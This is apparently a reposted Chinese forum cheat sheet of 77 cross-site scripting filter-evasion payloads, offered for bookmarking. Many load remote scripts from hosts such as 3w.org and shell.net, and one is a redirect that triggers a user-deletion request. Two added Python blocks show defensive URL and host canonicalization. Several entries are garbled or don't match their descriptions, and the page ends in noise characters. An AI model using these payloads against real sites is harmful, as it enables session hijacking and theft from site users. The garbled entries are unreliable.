There seems to be relatively little XSS material on t00ls, so when I saw something good I copied it over, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">
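Entries (3) through (19) are all the same thing dressed up differently: a javascript: URL placed in an attribute that takes a URL, hidden from a naive filter by case changes, character references, embedded tab/newline/CR, NUL bytes or leading spaces. A defensive check therefore has to canonicalize the attribute value the way a browser does before it looks at the scheme, and then compare against an allowlist rather than search for the string "javascript". The following is an added example written for this page, not code from the original post or from the cheat sheet it copies; the function names and the sample values are constructed for illustration.

```python
import html
import re

# Schemes a URL-bearing attribute (href, src, background, ...) may use.
# Everything else, including javascript:, vbscript: and data:, is rejected.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers strip C0 controls and spaces from both ends of a URL and drop
# tab, LF and CR anywhere inside it (WHATWG URL parsing rules).
_EDGE_CHARS = "".join(chr(c) for c in range(0x21))
_INNER_DROP = re.compile(r"[\t\n\r]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def canonicalize_url_attr(value: str) -> str:
    """Reduce an attribute value to the URL a browser would actually fetch.

    Order matters: the HTML parser decodes character references first
    (with or without a trailing semicolon), then the URL parser cleans up
    whitespace. NUL removal is an extra hardening step for legacy parsers.
    """
    url = html.unescape(value)
    url = url.replace("\x00", "")
    url = url.strip(_EDGE_CHARS)
    return _INNER_DROP.sub("", url)


def scheme_of(url: str) -> str:
    """Return the lower-cased scheme, or '' for a relative URL."""
    match = _SCHEME.match(url)
    return match.group(1).lower() if match else ""


def is_safe_url_attr(value: str) -> bool:
    """True if the canonical form is relative or uses an allowed scheme."""
    scheme = scheme_of(canonicalize_url_attr(value))
    return scheme == "" or scheme in ALLOWED_SCHEMES


# Constructed samples mirroring the obfuscations listed above.
SAMPLES = [
    "https://example.com/page",          # plain, allowed
    "/relative/path",                    # relative, allowed
    "javascript:alert('XSS')",           # (3)
    "JaVaScRiPt:alert('XSS')",           # (4) mixed case
    "&#106;avascript:alert('XSS')",      # (5) decimal character reference
    "&#x6A;avascript:alert('XSS')",      # (10) hex character reference
    "jav\tascript:alert('XSS')",         # (11) embedded tab
    "jav&#x09;ascript:alert('XSS')",     # (12) encoded tab
    "jav\nascript:alert('XSS')",         # (13) embedded newline
    "java\x00script:alert('XSS')",       # (17) NUL byte
    "   javascript:alert('XSS')",        # (19) leading spaces
    "vbscript:msgbox('XSS')",            # another active scheme
]


def audit(values):
    """Map each sample to its canonical form and the allow/reject verdict."""
    return {v: (canonicalize_url_attr(v), is_safe_url_attr(v)) for v in values}


if __name__ == "__main__":
    for raw, (canon, ok) in audit(SAMPLES).items():
        print(f"{'allow ' if ok else 'reject'}  {raw!r:40} -> {canon!r}")
```

The design point is the allowlist: a check that only has to recognise http, https and mailto does not care how many ways there are to spell javascript, and the canonicalization step exists only so that a relative URL or a harmless absolute one is not mistaken for something else.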
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace. The HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
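Entries (68) through (76) are all ways of writing one host so that a plain string comparison against an allowlist of link targets fails: a 32-bit decimal number, hex or octal components, a mix of the three, a scheme-relative URL, a missing "www", or a trailing dot. The defensive answer is to canonicalize the host the way the WHATWG URL IPv4 parser does before comparing. The block below is an added example written for this page, not code from the original post or the cheat sheet it copies; the function names and the allowlist are constructed, and the test hosts are the ones the entries above use.

```python
import re
from urllib.parse import urlsplit

# Digits permitted for each radix the legacy IPv4 syntax accepts.
_DIGITS = {8: "01234567", 10: "0123456789", 16: "0123456789abcdef"}


def _ipv4_number(part: str):
    """Parse one dotted-IPv4 component as decimal, 0x-hex or 0-octal."""
    radix = 10
    if part[:2].lower() == "0x":
        part, radix = part[2:], 16
        if part == "":
            return 0                    # a bare "0x" means zero
    elif len(part) > 1 and part[0] == "0":
        part, radix = part[1:], 8
    if part == "" or any(ch not in _DIGITS[radix] for ch in part.lower()):
        return None
    return int(part, radix)


def canonical_ipv4(host: str):
    """Return dotted-quad for any numeric IPv4 spelling, else None.

    Follows the WHATWG URL IPv4 parser: up to four components, the last of
    which carries the remaining bytes (so one bare 32-bit number is valid).
    """
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                     # tolerate a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for part in parts:
        n = _ipv4_number(part)
        if n is None:
            return None
        numbers.append(n)
    if any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n * 256 ** (3 - i)
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(host: str) -> str:
    """Lower-case, drop one trailing dot, and normalise numeric hosts."""
    host = host.lower()
    if len(host) > 1 and host.endswith("."):
        host = host[:-1]
    dotted = canonical_ipv4(host)
    return dotted if dotted is not None else host


def is_allowed_link(url: str, allowed_hosts) -> bool:
    """Allow relative links and http(s) links whose canonical host is listed."""
    cleaned = re.sub(r"[\t\n\r]", "", url.strip())   # the URL parser drops these
    parts = urlsplit(cleaned)
    if parts.scheme not in ("", "http", "https"):
        return False                    # javascript:, vbscript:, data:, ...
    if parts.hostname is None:
        return True                     # relative URL, stays on this site
    allowed = {canonical_host(h) for h in allowed_hosts}
    return canonical_host(parts.hostname) in allowed


if __name__ == "__main__":
    # Constructed allowlist; the spellings come from the entries above.
    permitted = {"www.google.com", "192.168.0.1"}
    for link in ("http://3232235521/", "http://0xc0.0xa8.0x00.0x01/",
                 "http://0300.0250.0000.0001/", "http://www.google.com./",
                 "//www.google.com/", "http://google.com/"):
        print(f"{link:35} -> {is_allowed_link(link, permitted)}")
```

Note that "http://google.com/" is still rejected when only "www.google.com" is listed: canonicalization only collapses spellings of the same host, so the allowlist has to name every host that is genuinely acceptable.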
1 l( Y& ?; d8 c# k3 W
6 D, f+ V* {- @% ]* _原文地址:http://fuzzexp.org/u/0day/?p=143 V) L, f# k4 @9 ^, K7 e$ w1 l* P
0 p: e3 C" G1 q- h1 u: M0 ~ |